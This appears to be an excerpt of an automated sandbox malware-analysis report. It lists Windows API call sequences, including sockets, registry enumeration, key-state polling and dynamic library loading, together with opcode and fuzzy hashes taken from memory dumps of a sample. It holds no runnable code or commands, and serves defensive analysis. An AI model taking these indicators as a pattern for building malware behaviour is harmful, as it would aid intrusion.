• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E41A26
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E41B49
• CloseHandle.KERNEL32(?), ref: 00E41BBF
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: bd9303344188a662a1544d91a9c90c5fe068632e10f1607419b0b3940cf605e7
• Instruction ID: 616ab14ceed76da38e966cda6ae0a6394a147ace11c359790d758163cd58115e
• Opcode Fuzzy Hash: bd9303344188a662a1544d91a9c90c5fe068632e10f1607419b0b3940cf605e7
• Instruction Fuzzy Hash: 42817174600204EBDF109F64D886BADBBE5EF44724F15C499FA05BF3C2D7B5A9418BA0
APIs
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E4E1D5
• SendMessageW.USER32(?,000000B0,?,?), ref: 00E4E20D
• IsDlgButtonChecked.USER32(?,00000001), ref: 00E4E248
• GetWindowLongW.USER32(?,000000EC), ref: 00E4E269
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E4E281
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend$ButtonCheckedLongWindow
• String ID:
• API String ID: 3188977179-0
• Opcode ID: ffaf9939cb0377c927e1b92b5fc5dbac94330f8f107055e47e9ce664afb501ae
• Instruction ID: dcb8da0e779b1609d85260adaaa3d8b8b724cdaa2b3a64377fe61cf82d354f12
• Opcode Fuzzy Hash: ffaf9939cb0377c927e1b92b5fc5dbac94330f8f107055e47e9ce664afb501ae
• Instruction Fuzzy Hash: 7D61AF34A45204AFDB24CF58D895FBA77BAFF8A304F045099F85AB73A1C7B1A940CB11
APIs
  • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
  • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00E406EE
• GetProcAddress.KERNEL32(00000000,?), ref: 00E4077D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00E4079B
• GetProcAddress.KERNEL32(00000000,?), ref: 00E407E1
• FreeLibrary.KERNEL32(00000000,00000004), ref: 00E407FB
  • Part of subcall function 00DFE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00E2A574,?,?,00000000,00000008), ref: 00DFE675
  • Part of subcall function 00DFE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00E2A574,?,?,00000000,00000008), ref: 00DFE699
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Opcode ID: 4491a9356d468d94b8a1094c0f57999a04b5bdc2ba544be2f4a6abb0db494ccc
• Instruction ID: 369ca639758bb1fe860c05d6a3d25417b9c4e25badd4e614d230949951c834a7
• Opcode Fuzzy Hash: 4491a9356d468d94b8a1094c0f57999a04b5bdc2ba544be2f4a6abb0db494ccc
• Instruction Fuzzy Hash: 08518A75A00249DFCB00EFA9D884DADB7B5FF49310B158066EA05AB352DB70ED46CFA1
APIs
  • Part of subcall function 00E43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E42BB5,?,?), ref: 00E43C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E42EEF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E42F2E
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E42F75
• RegCloseKey.ADVAPI32(?,?), ref: 00E42FA1
• RegCloseKey.ADVAPI32(00000000), ref: 00E42FAE
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 3740051246-0
• Opcode ID: 0488f4798eb7d6c6fc8e9838bc3dac0f8e658a78929422be7de013164ba00d9a
• Instruction ID: 7067e1d2e1e9066d65650b4e7951bfca621cc515a3a0c00a426289cbb9fc06e2
• Opcode Fuzzy Hash: 0488f4798eb7d6c6fc8e9838bc3dac0f8e658a78929422be7de013164ba00d9a
• Instruction Fuzzy Hash: 2D515971208244AFD704EF65DC81E6AB7F9FF88314F80981DF695A7291DB70E909CB62
APIs
• select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00E38E7C
• WSAGetLastError.WS2_32(00000000), ref: 00E38E89
• __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00E38EAD
• _strlen.LIBCMT ref: 00E38EF7
• WSAGetLastError.WS2_32(00000000), ref: 00E38F6A
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: ErrorLast$_strlenselect
• String ID:
• API String ID: 2217125717-0
• Opcode ID: 192f011d359447ef28dbf488ee353a504dfdca88f99c12eea2930f2f24097155
• Instruction ID: 1e1e8cf0cc17be0164a70e1ad31f4100c9b1af3bcdcd8f967b80ba7a9c5fe622
• Opcode Fuzzy Hash: 192f011d359447ef28dbf488ee353a504dfdca88f99c12eea2930f2f24097155
• Instruction Fuzzy Hash: B441C371600208AFCB14EB65DE89EEEBBBAEF58314F105159F116A7291DF70AE40CB70
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e353084d950762bfc260aa7bd2c99782de63abd9e9c0b7d85f2e1af36fdeaac6
• Instruction ID: e6254badbf19002e5d2964ad95831ada8d3d707f40616573e2000a136203f4dc
• Opcode Fuzzy Hash: e353084d950762bfc260aa7bd2c99782de63abd9e9c0b7d85f2e1af36fdeaac6
• Instruction Fuzzy Hash: 9D41D339E02104AFC760DF68EC44FEABB68EB4D354F242165E91AB72E1C770AD01DA50
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E312B4
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E312DD
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E3131C
  • Part of subcall function 00DE936C: __swprintf.LIBCMT ref: 00DE93AB
  • Part of subcall function 00DE936C: __itow.LIBCMT ref: 00DE93DF
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E31341
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E31349
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 8d93bdaede993894ac5c2d052c583715218a637a3ca430464f902eb33ad8e015
• Instruction ID: acbe92a6020bb1d24fe25c88ec1ebe36f9c3d50471aef47671de11c0ef8b071d
• Opcode Fuzzy Hash: 8d93bdaede993894ac5c2d052c583715218a637a3ca430464f902eb33ad8e015
• Instruction Fuzzy Hash: BC411D35A00145DFCF01EF65C995AAEBBF5FF08314B158099E90AAB3A2CB31ED15DB60
APIs
• GetCursorPos.USER32(000000FF), ref: 00DFB64F
• ScreenToClient.USER32(00000000,000000FF), ref: 00DFB66C
• GetAsyncKeyState.USER32(00000001), ref: 00DFB691
• GetAsyncKeyState.USER32(00000002), ref: 00DFB69F
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: 615f90d57bf698af3f0d2676511a142f40d1b026ff0130b8359ff1704887f76b
• Instruction ID: 4b09df0087d9bc92be2dc6c713ddc8f5c12d92f4bedf4fe91febc952e1cfc4cd
• Opcode Fuzzy Hash: 615f90d57bf698af3f0d2676511a142f40d1b026ff0130b8359ff1704887f76b
• Instruction Fuzzy Hash: E2416031608119FFDF159F65CC44AEDBBB4FB05365F10831AF829A6290CB30A994DFA1
APIs
• GetWindowRect.USER32(?,?), ref: 00E1B369
• PostMessageW.USER32(?,00000201,00000001), ref: 00E1B413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E1B41B
• PostMessageW.USER32(?,00000202,00000000), ref: 00E1B429
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E1B431
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: b9ca2dc5a1a9ffe51e03fbf406f0e174627485f33f5ffe73153550e734ce10ac
• Instruction ID: a1206e0b57fa57ca1012d587e87f4dc6b852720fee01f567a3dc17bbc8ad001f
• Opcode Fuzzy Hash: b9ca2dc5a1a9ffe51e03fbf406f0e174627485f33f5ffe73153550e734ce10ac
• Instruction Fuzzy Hash: A5319C71904219EFDB14CF69DD49ADE7BB5EB04329F108229F921AA1D1C3F099A4CB91
APIs
• IsWindowVisible.USER32(?), ref: 00E1DBD7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E1DBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E1DC2C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E1DC52
• _wcsstr.LIBCMT ref: 00E1DC5C
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3902887630-0
                                                                                                                  • Opcode ID: 25474bb703a01ba58ddaa5f1dc6548ac6265e2a41f16a4853cac9387da726c4d
                                                                                                                  • Instruction ID: 7d9658468c7fbc31b1254e8f136c0c24622f8cde1a4c6221966c35effb8da985
                                                                                                                  • Opcode Fuzzy Hash: 25474bb703a01ba58ddaa5f1dc6548ac6265e2a41f16a4853cac9387da726c4d
                                                                                                                  • Instruction Fuzzy Hash: 6F21077160C104BBEB155B39DC49EBFBBA8DF45764F118029F90AEA191EAA1DC81D2A0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE50E6: _wcsncpy.LIBCMT ref: 00DE50FA
                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,00E260C3), ref: 00E26369
                                                                                                                  • GetLastError.KERNEL32(?,?,?,00E260C3), ref: 00E26374
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00E260C3), ref: 00E26388
                                                                                                                  • _wcsrchr.LIBCMT ref: 00E263AA
                                                                                                                    • Part of subcall function 00E26318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00E260C3), ref: 00E263E0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3633006590-0
                                                                                                                  • Opcode ID: da91e0c841b9099de9029e7bc392929f016690c786c609a8750bd75eec6d9fe2
                                                                                                                  • Instruction ID: 5baa144be056933f2c7bc1abe4873a052694880f242b73e851b0ee024fdb7247
                                                                                                                  • Opcode Fuzzy Hash: da91e0c841b9099de9029e7bc392929f016690c786c609a8750bd75eec6d9fe2
                                                                                                                  • Instruction Fuzzy Hash: 4A210831A052298ADB25EB74BC46FEA33ACEF553A4F506165F045F31D0EBA0D9848A74
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E3A82C: inet_addr.WS2_32(00000000), ref: 00E3A84E
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E38BD3
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00E38BE2
                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00E38BFE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3701255441-0
                                                                                                                  • Opcode ID: 1fd5c2434ddb71dea5f8ff6b1615df41f0a6a6a88e181f8b37fd71eab9a40b6e
                                                                                                                  • Instruction ID: 627097bbde3f0048b42fab0ff0ee594f2f58794f8b341a1645f80bdf4946ae84
                                                                                                                  • Opcode Fuzzy Hash: 1fd5c2434ddb71dea5f8ff6b1615df41f0a6a6a88e181f8b37fd71eab9a40b6e
                                                                                                                  • Instruction Fuzzy Hash: AE219F317002149FDB10EB28DD49B7EB7E9EF58750F045459F916A7292CEB4A8058762
                                                                                                                  APIs
                                                                                                                  • IsWindow.USER32(00000000), ref: 00E38441
                                                                                                                  • GetForegroundWindow.USER32 ref: 00E38458
                                                                                                                  • GetDC.USER32(00000000), ref: 00E38494
                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00E384A0
                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00E384DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4156661090-0
                                                                                                                  • Opcode ID: 75c60e632fad14fbe31b2f6558e26d255db75031a18aefc22d058b2f65c0e245
                                                                                                                  • Instruction ID: e1153cd757af8581154813a1fb36c93e955031e628e04813a715a945cd5f38c5
                                                                                                                  • Opcode Fuzzy Hash: 75c60e632fad14fbe31b2f6558e26d255db75031a18aefc22d058b2f65c0e245
                                                                                                                  • Instruction Fuzzy Hash: 0C218175B00204AFD700EFA5DD89AAEBBF5EF48341F148479F95AA7251DB70AC04CB60
                                                                                                                  APIs
                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DFAFE3
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00DFAFF2
                                                                                                                  • BeginPath.GDI32(?), ref: 00DFB009
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00DFB033
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3225163088-0
                                                                                                                  • Opcode ID: f8f1f051ac7d515a104e006099060fc540763d69a0e83d07fed6d5de4e8fdb16
                                                                                                                  • Instruction ID: 8e144b7195cdf7000c0ac6e2d644f007bd9cb987b5ee71ef9ecb030f0cb15456
                                                                                                                  • Opcode Fuzzy Hash: f8f1f051ac7d515a104e006099060fc540763d69a0e83d07fed6d5de4e8fdb16
                                                                                                                  • Instruction Fuzzy Hash: 7021A7B0904209EFD7109F56EC447AA7768BB563A5F188256F514F61E0C7B05949CB60
                                                                                                                  APIs
                                                                                                                  • __calloc_crt.LIBCMT ref: 00E021A9
                                                                                                                  • CreateThread.KERNEL32(?,?,00E022DF,00000000,?,?), ref: 00E021ED
                                                                                                                  • GetLastError.KERNEL32 ref: 00E021F7
                                                                                                                  • _free.LIBCMT ref: 00E02200
                                                                                                                  • __dosmaperr.LIBCMT ref: 00E0220B
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2664167353-0
                                                                                                                  • Opcode ID: 58b90043669b3d91354c2cde667df83b66a416f9957cdeb9cacfa93f194a723b
